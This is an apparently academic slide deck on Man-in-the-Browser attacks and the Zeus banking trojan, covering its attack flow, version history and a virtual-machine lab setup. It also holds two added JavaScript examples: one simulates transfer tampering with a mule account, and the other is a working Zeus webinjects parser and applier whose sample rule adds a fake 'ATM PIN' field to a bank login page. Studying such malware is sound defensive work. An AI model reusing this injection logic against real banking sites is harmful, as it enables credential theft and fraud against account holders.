Man-In-The-Browser
Aras Tarhan, Manos Dimogerontakis, Mário Almeida, Umit Buyuksahin
OUTLINE
● Man-in-the-Browser Attack
● Method of Attack
● Banking Trojans
● Zeus
● Zeus Installation
● Zeus Configuration Files
● DEMO
Man-in-the-Browser Attack
● Online phishers steal money from online banking customers.
● Customers are targeted with increasingly advanced methods.
● One of the latest and most dangerous is Man-in-the-Browser (MitB).
● Malicious code running inside the browser modifies the actions performed by the user (for example the fields of a transfer) and steals confidential information.
● Because the tampering happens inside the browser, after TLS decryption and before the page is rendered, the user cannot detect it and the server receives an apparently legitimate request.
Method of Attack
● The trojan installs an extension into the browser configuration (or, as Zeus does, hooks the browser's networking libraries such as wininet.dll and nspr4.dll).
● Whenever a page is loaded, the extension compares the URL of the page against a list of known sites targeted for attack.
● When the handler detects a page load matching a pattern in its target list, it registers a handler on the page's submit button.
● When the submit button is pressed, the extension extracts the data from all form fields through the DOM, remembers the original values, rewrites the ones it wants to change (for example destination account and amount) and lets the submission continue.
Method of Attack (2)
● The browser sends the form, including the modified values, to the server.
● The server receives the modified values as a normal request: the session, cookies and credentials are all genuine.
● The server performs the transaction and generates a receipt.
● The browser receives the receipt for the modified transaction, and the extension rewrites it so that the user sees the original details.
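The flow above, as an added example that is not part of the original slides and not code from any real trojan: a Node-runnable simulation of the MitB transaction tampering. Everything specific in it is constructed (the bank URL, the form field names, the mule account, the receipt text); a real implementation would run inside the browser, either as a 'submit' listener in an extension or, as Zeus does, as hooks in wininet.dll / nspr4.dll, and would read and rewrite the live DOM, which Node does not have.

```javascript
// Added example, not code from the slides or from any real trojan: a
// Node-runnable simulation of the Man-in-the-Browser transaction flow.
// The bank URL, form field names, mule account and receipt text are all
// constructed. A real implementation runs inside the browser (a 'submit'
// listener in an extension, or hooks in wininet.dll / nspr4.dll as Zeus
// does) and touches the live DOM, which Node does not have.

// Step 1: the target list, normally kept in the trojan's config file.
const TARGET_PATTERNS = [
  /^https:\/\/online\.bank\.example\/transfer/i,   // constructed bank URL
];

function isTargeted(url) {
  return TARGET_PATTERNS.some((re) => re.test(url));
}

// Step 2: the submit handler. It remembers every original field value,
// rewrites the fields the attacker cares about and returns both sets.
function tamperOnSubmit(fields, muleAccount, muleAmount) {
  const original = { ...fields };
  const modified = { ...fields, to_account: muleAccount, amount: muleAmount };
  return { original, modified };
}

// Step 3: a stand-in for the bank. It sees a well-formed request over the
// victim's own authenticated session and cannot tell the values were changed.
function bankProcessTransfer(posted) {
  return `Transfer of EUR ${posted.amount} from ${posted.from_account} ` +
         `to ${posted.to_account} completed. Ref: ${posted.reference}.`;
}

// Step 4: the receipt echoes the mule account and amount; the trojan patches
// the page text so the victim sees what they originally typed.
function patchReceipt(receipt, original, modified) {
  let shown = receipt;
  for (const key of Object.keys(original)) {
    if (original[key] !== modified[key]) {
      shown = shown.split(String(modified[key])).join(String(original[key]));
    }
  }
  return shown;
}

// Runs the whole flow once and returns every intermediate value.
function simulateMitb(url, fields, muleAccount, muleAmount) {
  if (!isTargeted(url)) {
    // Not a targeted page: the form goes through untouched.
    const receipt = bankProcessTransfer(fields);
    return { tampered: false, sent: fields, receipt, shown: receipt };
  }
  const { original, modified } = tamperOnSubmit(fields, muleAccount, muleAmount);
  const receipt = bankProcessTransfer(modified);             // what the bank did
  const shown = patchReceipt(receipt, original, modified);   // what the victim sees
  return { tampered: true, sent: modified, receipt, shown };
}

// Constructed sample transaction: the victim pays 120.00 to their landlord.
const SAMPLE_FORM = {
  from_account: 'DE00 1111 2222 3333',
  to_account:   'DE00 4444 5555 6666',
  amount:       '120.00',
  reference:    'rent',
};

const mitbResult = simulateMitb('https://online.bank.example/transfer', SAMPLE_FORM,
                                'LV00 9999 8888 7777', '4900.00');
console.log('sent to bank:', mitbResult.sent);
console.log('bank receipt:', mitbResult.receipt);
console.log('victim sees :', mitbResult.shown);
```

The point the simulation makes visible is that the bank's receipt and the victim's screen disagree, while every message on the wire was well-formed and authenticated. The receipt patch is plain text substitution, so it only stays consistent as long as the bank echoes the posted values verbatim; that fragility is one reason real kits ship per-bank injection rules rather than generic rewriting.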
Banking Trojans
A number of Trojan families are used to conduct MITB attacks. Some MITB Trojans are so advanced that they have streamlined the process for committing fraud, programmed with functionality to fully automate the process from infection to cash out.
Some known banking trojans:
● Zeus
● Sinowal (Torpig)
● SpyEye
● Carberp
● Feodo
● Tatanga
● ...
ZEUS
● Aim: steal the victim's credentials.
● Steals banking information using keystroke logging and form grabbing.
● First appeared in 2007 and became widespread in 2009 (about 3.6 million infected machines in the US).
● Targets only Microsoft Windows.
● Version used in this project: 2.0.8.9
Evolution of ZEUS
● Version 2.0.0.0, 01.04.2010
○ fully compatible with previous versions
○ the installation process in the system was rewritten to send reports to the control panel
○ proper support for 32-bit applications on Windows x64
○ the botnet name is limited to 20 characters and can contain any international characters
○ full support (as with wininet.dll) for hooking nspr4.dll (Firefox), but without HTTP-fakes
○ the configuration file is read in UTF-8 encoding
Evolution of ZEUS
● Version 2.0.1.0, 28.04.2010
○ modified to bind to the user/OS
○ minor improvements to HTTP-injects
● Version 2.0.2.0, 10.05.2010
○ forced change of Mozilla Firefox security settings so that HTTP-injects work normally
● Version 2.0.3.0, 19.05.2010
○ in the configuration file:
■ added the option "StaticConfig.disable_tcpserver"
■ added the option "StaticConfig.remove_certs"
○ in the control panel, fixed a bug in the module "Botnet -> Bots"
Evolution of ZEUS
● Version 2.0.5.0, 08.06.2010
○ fixed minor bugs in the HTTP-grabber
● Version 2.0.6.0, 22.06.2010
○ fixed an error that resulted in HTTP-injects being disabled
● Version 2.0.8.0, 17.08.2010
○ two new options were added to the HTTP-inject parameters: "I" (case-insensitive URL comparison) and "C" (case-insensitive context comparison)
● Version 2.1.0.0, 20.03.2011
○ RDP + VNC backconnect added, to connect remotely to the victim
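The HTTP-injects that most of these changelog entries refer to are driven by the webinjects configuration file (the "Zeus Configuration Files" item of the outline). As an added example that is not part of the slides and not code from the Zeus kit, the following parses that text format (set_url / data_before / data_inject / data_after / data_end blocks) and applies the rules to a page, so that the "I" and "C" options added in 2.0.8.0 can be exercised. It is written from the publicly documented format; the bank URLs, HTML and rule text are constructed, and the flag semantics (G/P for request method, L for log-only grabbing, I and C for case-insensitive URL and context matching, data_inject replacing the text between data_before and data_after) are my reading of the format and should be treated as assumptions.

```javascript
// Added example, not code from the slides or from the ZeuS kit: a parser for
// the ZeuS "webinjects" text format plus a function that applies the parsed
// rules to page content. Written from the publicly documented format; the
// URLs, HTML and rule text below are constructed. Flag handling is my reading
// of the format and is an assumption:
//   G / P   rule applies to GET / POST requests
//   L       log only: grab the text between data_before and data_after
//   I       compare the URL case-insensitively             (added in 2.0.8.0)
//   C       compare data_before / data_after case-insensitively  (2.0.8.0)
// With both data_before and data_after, data_inject replaces the text between
// them; with only one of them, it is inserted at that anchor (assumption).

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// A ZeuS mask uses '*' for any run of characters; other mask characters are
// not handled here.
function maskToRegex(mask, ignoreCase, anchored) {
  const body = mask.split('*').map(escapeRegex).join('.*?');
  return new RegExp(anchored ? `^${body}$` : body, ignoreCase ? 'is' : 's');
}

function parseWebinjects(text) {
  const rules = [];
  let rule = null;
  let section = null;                        // name of the open data_* block
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (section) {                           // inside a block: keep lines verbatim
      if (line === 'data_end') { rule[section] = rule[section].join('\n'); section = null; }
      else rule[section].push(raw);
      continue;
    }
    if (!line || line.startsWith(';')) continue;          // blank line or comment
    if (line.startsWith('set_url ')) {
      const [url, flags = ''] = line.slice(8).trim().split(/\s+/);
      rule = { url, flags, data_before: '', data_inject: '', data_after: '' };
      rules.push(rule);
    } else if (['data_before', 'data_inject', 'data_after'].includes(line)) {
      if (!rule) throw new Error(`${line} before any set_url`);
      section = line;
      rule[section] = [];
    } else {
      throw new Error(`unexpected line: ${line}`);
    }
  }
  if (section) throw new Error(`unterminated ${section} block`);
  return rules;
}

// Apply every matching rule to one response. Returns the (possibly modified)
// HTML and whatever the L-flagged rules grabbed.
function applyWebinjects(rules, url, method, html) {
  let page = html;
  const grabbed = [];
  const need = method.toUpperCase() === 'POST' ? 'P' : 'G';
  for (const r of rules) {
    if (!r.flags.includes(need)) continue;
    if (!maskToRegex(r.url, r.flags.includes('I'), true).test(url)) continue;
    if (!r.data_before && !r.data_after) continue;        // nothing to anchor on
    const ci = r.flags.includes('C');
    let start = 0, end = 0;
    if (r.data_before) {
      const m = maskToRegex(r.data_before, ci, false).exec(page);
      if (!m) continue;
      start = end = m.index + m[0].length;
    }
    if (r.data_after) {
      const m = maskToRegex(r.data_after, ci, false).exec(page.slice(start));
      if (!m) continue;
      end = start + m.index;
      if (!r.data_before) start = end;
    }
    if (r.flags.includes('L')) {
      grabbed.push({ name: r.data_inject, data: page.slice(start, end) });
      continue;
    }
    page = page.slice(0, start) + r.data_inject + page.slice(end);
  }
  return { html: page, grabbed };
}

// Constructed sample rule file (two rules) and two constructed pages.
const SAMPLE_WEBINJECTS = `; constructed sample, not a real bank
set_url https://online.bank.example/login* GPI
data_before
name="password"*</tr>
data_end
data_inject
<tr><td>ATM PIN:</td><td><input type="text" name="atmpin"></td></tr>
data_end
data_after
data_end

set_url https://online.bank.example/balance GPLC
data_before
<span id="BALANCE">
data_end
data_inject
balance
data_end
data_after
</span>
data_end
`;

const SAMPLE_LOGIN_PAGE = `<form method="post">
<tr><td>User:</td><td><input type="text" name="user"></td></tr>
<tr><td>Pass:</td><td><input type="password" name="password"></td></tr>
<tr><td><input type="submit" value="Log in"></td></tr>
</form>`;

const SAMPLE_BALANCE_PAGE = '<p>Balance: <span id="balance">1,234.56</span></p>';

function demo() {
  const rules = parseWebinjects(SAMPLE_WEBINJECTS);
  // "I" lets the first rule match an upper-case URL; "C" lets the second
  // rule's data_before match <span id="balance"> despite the case difference.
  const login = applyWebinjects(rules, 'HTTPS://ONLINE.BANK.EXAMPLE/login?lang=en', 'GET', SAMPLE_LOGIN_PAGE);
  const balance = applyWebinjects(rules, 'https://online.bank.example/balance', 'GET', SAMPLE_BALANCE_PAGE);
  return { rules, login, balance };
}
```

The first rule is the classic inject: it adds an extra "ATM PIN" row directly under the password row of the login form, which the bank never asked for. The second rule, with the L flag, leaves the page untouched and only captures the balance text between the two anchors. Matching with I and C matters in practice because the same inject file is meant to survive trivial differences in how a bank writes its URLs and markup.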
Zeus - Capabilities
● gets OS info
● performs the usual botnet commands (reboot, shutdown, log off, kill OS)
● takes screenshots
● receives a script to be executed
● searches files
● all commands and their states can be viewed on the control panel on the server
Used Environments
● Virtual Machine
○ adds a significant layer of security and safety
○ both the server and the client to be infected are installed on distinct virtual machines
○ used program: Oracle VirtualBox 4.1.6 for Windows hosts
○ each VM has two network adapters: host-only to communicate with each other and NAT for outside internet access
● Operating System
○ used program: Microsoft Windows XP Service Pack 3
○ chosen because the Zeus version we obtained builds and runs on Windows
● Server and Database
○ to manage the bots inside the victims
○ to receive the information from bots running on infected clients
○ to store the data collected about the victim
○ used program: XAMPP 1.7.7 including
■ Apache 2.2.21
■ MySQL 5.5.16
■ PHP 5.3.8
■ phpMyAdmin 3.4.5
Zeus Installation
Demo